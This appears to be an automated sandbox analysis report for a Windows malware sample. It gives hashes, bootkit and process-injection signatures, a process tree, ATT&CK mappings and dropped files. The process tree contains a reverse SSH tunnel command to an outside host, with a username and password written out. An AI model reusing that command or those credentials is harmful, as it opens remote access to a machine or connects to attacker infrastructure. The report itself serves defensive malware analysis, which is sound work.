6270352f7c4380be8dc385a5cdfab6d9f7d1e1462ba7d073c744cdf0f02b1c96

Analysis

max time kernel
144s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10/04/2024, 10:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe
Size

730KB
MD5

eadc7ccc7032879c147cf3b214b9a663
SHA1

f4f4bd5c6737b15750adfdd36d95f223b88aea4f
SHA256

6270352f7c4380be8dc385a5cdfab6d9f7d1e1462ba7d073c744cdf0f02b1c96
SHA512

5b38a344f47392cba47b3d7d8a67eb5a606416b982f237d852547241d9bf9717591893bebce5b15e531e7381444b9eb207e76828b71c73c498296c5c868d57ca
SSDEEP

12288:i9UAnhPd6qmvCLAsShDHA8jgn7qkDBzYzEBODFkMO+EEuKmY0O7XlZHPyQtuMlCh:i9UAxd69K8NhDvY7q2Y75/uW57XLqQRq

Score

7^/10

bootkit persistence

Malware Config

Signatures

Executes dropped EXE 5 IoCs

pid	Process
2132	alg.exe
2116	cssrs.exe
2248	System.exe
1964	cssrs.exe
2484	cssrs.exe

Loads dropped DLL 10 IoCs

pid	Process
2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe
2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe
2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe
2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe
2132	alg.exe
2132	alg.exe
2132	alg.exe
2132	alg.exe
2116	cssrs.exe
1964	cssrs.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	cssrs.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2116 set thread context of 1964	2116	cssrs.exe	33
PID 1964 set thread context of 2484	1964	cssrs.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2116	cssrs.exe
1964	cssrs.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 2876 wrote to memory of 2132	2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	28
PID 2876 wrote to memory of 2132	2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	28
PID 2876 wrote to memory of 2132	2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	28
PID 2876 wrote to memory of 2132	2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	28
PID 2876 wrote to memory of 2132	2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	28
PID 2876 wrote to memory of 2132	2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	28
PID 2876 wrote to memory of 2132	2876	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	28
PID 2132 wrote to memory of 2116	2132	alg.exe	29
PID 2132 wrote to memory of 2116	2132	alg.exe	29
PID 2132 wrote to memory of 2116	2132	alg.exe	29
PID 2132 wrote to memory of 2116	2132	alg.exe	29
PID 2132 wrote to memory of 2116	2132	alg.exe	29
PID 2132 wrote to memory of 2116	2132	alg.exe	29
PID 2132 wrote to memory of 2116	2132	alg.exe	29
PID 2132 wrote to memory of 2248	2132	alg.exe	31
PID 2132 wrote to memory of 2248	2132	alg.exe	31
PID 2132 wrote to memory of 2248	2132	alg.exe	31
PID 2132 wrote to memory of 2248	2132	alg.exe	31
PID 2132 wrote to memory of 2248	2132	alg.exe	31
PID 2132 wrote to memory of 2248	2132	alg.exe	31
PID 2132 wrote to memory of 2248	2132	alg.exe	31
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 2116 wrote to memory of 1964	2116	cssrs.exe	33
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34
PID 1964 wrote to memory of 2484	1964	cssrs.exe	34

C:\Users\Admin\AppData\Local\Temp\eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Win.Msi\alg.exe
  "C:\Win.Msi\alg.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2132
- - C:\Win.Msi\cssrs.exe
    "C:\Win.Msi\cssrs.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2116
  - - C:\Win.Msi\cssrs.exe
      "C:\Win.Msi\cssrs.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Writes to the Master Boot Record (MBR)
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1964
    - - C:\Win.Msi\cssrs.exe
        
        "C:\Win.Msi\cssrs.exe"
        5⤵
        Executes dropped EXE
        
        PID:2484
- - C:\Win.Msi\System.exe
    "C:\Win.Msi\System.exe" -ssh -R 26289:127.0.0.1:2103 thor.mine.nu -l thor -pw t4ct1cs
    3⤵
    - Executes dropped EXE
    PID:2248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Defense Evasion

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Win.Msi\3proxy.cfg

Filesize
132B

MD5
8342b622ca3ce4dc24dfe9d1d73aa231

SHA1
88ddbd474304e28a13f0b8b645074456cc78641b

SHA256
d5f2ef03c5a3d9affc5e7c0edca0ca887c5b15fa18a67e15b7982c2d8a741f55

SHA512
0f632515d0638110da4028553395495031b7405c1d8eb02b50312e076c5c8f3449ec6331559e43829fc0dbfbdee696448d04694e4e47ef985f580f9d4a093697

Download Submit
C:\Win.Msi\DiskDoctor.lnk

Filesize
494B

MD5
cfa161b8d3e17c3d1f40d21feb22d2be

SHA1
98e4adc779744f15d0b225f550b6d69e5fcadfff

SHA256
6b08344314ce52545ade0984a5b85ea22904b9bcf207fbd0ff645d360909e6b4

SHA512
c9a04ac1f7bf6ff71adc60fc2cadd85ac5f2b4bb8bd54bf46e962149a61f921562c7552ffbc3428fe706b573f0432dccf8f739c3719d8f4f577576f5fb3cac4c

Download Submit
\Win.Msi\System.exe

Filesize
323KB

MD5
f4bf5c28bed38e31c143abfb9bebb6d5

SHA1
015f3e7ce4ff406f712b4ee1c893edfaa9276259

SHA256
d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971

SHA512
72e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935

Download Submit
\Win.Msi\alg.exe

Filesize
180KB

MD5
d89ad7d904e438ffa356e4bbfba92ab8

SHA1
a65c379010cd79f5fc1d744aa9231b9a99c8024b

SHA256
bfeb27b1c724b799a431200453a1ee04f26d485cf4c2cbe74786521d3ba7f9a2

SHA512
38282e6006e777806c08732f044bb32510abf4162178f7aedd4caf4eb541f5bdbc5b2409005d71cc47dc5e420dcae4acaa4fd0f68ad26178b1e0074e8f7c0a2c

Download Submit
\Win.Msi\cssrs.exe

Filesize
304KB

MD5
f30e9353181ad1d10385af8659820850

SHA1
0863abc64d553be5674852092a21375d0b1cea25

SHA256
a43fb5375b3cd531b59f33ac22a3b3d0202899a16b89dd29b1fc16e4b6ab2497

SHA512
01bab091941b47888498fc950451e90f2eb4be2ecab9b5132416f54eff5a3e76ac56fd3d387a579e6a365ca0f9f6ab8a2c55613b91b6fd0e8ef88927385543a9

Download Submit
memory/1964-41-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1964-39-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1964-43-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1964-47-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1964-49-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1964-52-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1964-78-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1964-58-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/2132-77-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2248-37-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/2484-65-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-79-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-69-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-72-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-61-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-74-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-76-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-59-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-56-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-63-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-82-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-85-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-88-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-91-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-94-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-97-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-100-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-103-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-106-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2484-109-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads